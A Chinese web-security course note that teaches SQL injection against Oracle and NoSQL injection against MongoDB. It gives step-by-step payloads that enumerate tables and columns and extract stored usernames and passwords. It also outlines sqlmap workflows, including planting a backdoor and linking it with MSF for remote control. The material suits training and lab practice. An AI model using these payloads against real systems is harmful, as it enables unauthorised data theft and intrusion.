26、web攻防——通用漏洞&SQL注入&Sqlmap&Oracle&Mongodb&DB2

文章目录

  • Oracle
  • MongoDB
  • sqlmap

SQL注入课程体系;

  1. 数据库注入:access、mysql、mssql、oracle、mongodb、postgresql等
  2. 数据类型注入:数字型、字符型、搜索型、加密型(base63 json)等
  3. 提交方式注入:get、post、cookie、http头等
  4. 查询方式注入:查询、增加、删除、更新、堆叠等
  5. 复杂注入利用:二次注入、dnslog注入、绕过bypass等

Oracle

参考资料:【实战】Oracle注入总结

# 判断字段数
order by 3

# 测回显
and 1=2 union select '1','2' from dual //要加单引号

26、web攻防——通用漏洞&SQL注入&Sqlmap&Oracle&Mongodb&DB2_第1张图片

# 查看数据库名(每次只能查一条数据)
and 1=2 union select '1',(select table_name from user_tables where rownum=1) from dual
and 1=2 union select '1',(select table_name from user_tables where rownum=1 and table_name not in ('LOGMNR_SEESION_EVOLVE$')) from dual

26、web攻防——通用漏洞&SQL注入&Sqlmap&Oracle&Mongodb&DB2_第2张图片
26、web攻防——通用漏洞&SQL注入&Sqlmap&Oracle&Mongodb&DB2_第3张图片

# 模糊爆库
and 1=2 union select '1',(select table_name from user_tables where rownum=1 and table_name like '%user%') from dual //%..%之间的内容为你想要的库名可能包含得关键词

26、web攻防——通用漏洞&SQL注入&Sqlmap&Oracle&Mongodb&DB2_第4张图片

# 爆列名
and 1=2 union select '1',(select column_name from all_tab_columns where rownum=1 and table_name='sns_users') from dual

26、web攻防——通用漏洞&SQL注入&Sqlmap&Oracle&Mongodb&DB2_第5张图片

# 爆其他列名
and 1=2 union select '1',(select column_name from all_tab_columns where rownum=1 and table_name='sns_users' and column_name not in ('USER_NAME')) from dual

26、web攻防——通用漏洞&SQL注入&Sqlmap&Oracle&Mongodb&DB2_第6张图片

# 爆数据
and 1=2 union select user_name,user_pwd from "sns_users"

26、web攻防——通用漏洞&SQL注入&Sqlmap&Oracle&Mongodb&DB2_第7张图片

# 爆其他数据
and 1=2 union select user_name,user_pwd from "sns_users" where USER_NAME<>'hu'

26、web攻防——通用漏洞&SQL注入&Sqlmap&Oracle&Mongodb&DB2_第8张图片

MongoDB

在python环境中,一般用MongoDB。

# 测回显
/new_list.php?id=1'});return ({title:1,content:'2
# 爆库名
/new_list.php?id=1'});return ({title:tojson(db),content:'2

26、web攻防——通用漏洞&SQL注入&Sqlmap&Oracle&Mongodb&DB2_第9张图片

# 爆表名
/new_list.php?id=1'});return ({title:tojson(db.getCollectionNames()),content:'2 //db.getCollectionNames()()返回得是数组,需要用tojson转换为字符串

26、web攻防——通用漏洞&SQL注入&Sqlmap&Oracle&Mongodb&DB2_第10张图片

# 爆字段内容
/new_list.php?id=1'});return ({title:tojson(db.Authority_confidentail.find()[0]),content:'2 // db.Authority_confidentail是当前用的集合(表),find函数用于查询,0是第一条数据。

26、web攻防——通用漏洞&SQL注入&Sqlmap&Oracle&Mongodb&DB2_第11张图片

sqlmap

sqlmap超详细笔记

  • sqlmap 数据库注入数据猜解
  • sqlmap 高权限注入读写执行
  • sqlmap 高权限注入联动MSF,其实就是用sqlmap上传一个后门,MSF监听端口,Sqlmap执行后门文件,靶机上线。

sqlmap支持哪些数据库注入?
26、web攻防——通用漏洞&SQL注入&Sqlmap&Oracle&Mongodb&DB2_第12张图片

不支持nosql

sqlmap支持哪些sql注入模型?
在这里插入图片描述

带外指的是类型dnslog这类得注入。

sqlmap支持其他不一样功能?
  sqlmap提供了很多脚本。
使用sqlmap一般注入流程分析?

  1. 判断注入点;
  2. 判断数据库类型,就是这个注入点是什么数据库的注入点;
  3. 根据数据库类型,是否存在高权限注入点;
  4. 文件读写、命令执行不行,就只能老老实实去猜数据;

  如果碰到一些网站,登陆后的注入点;电脑能访问,手机不能访问。建议使用sqlmap -r参数使用数据包进行跑。

你可能感兴趣的:(小迪安全,前端,sql,oracle)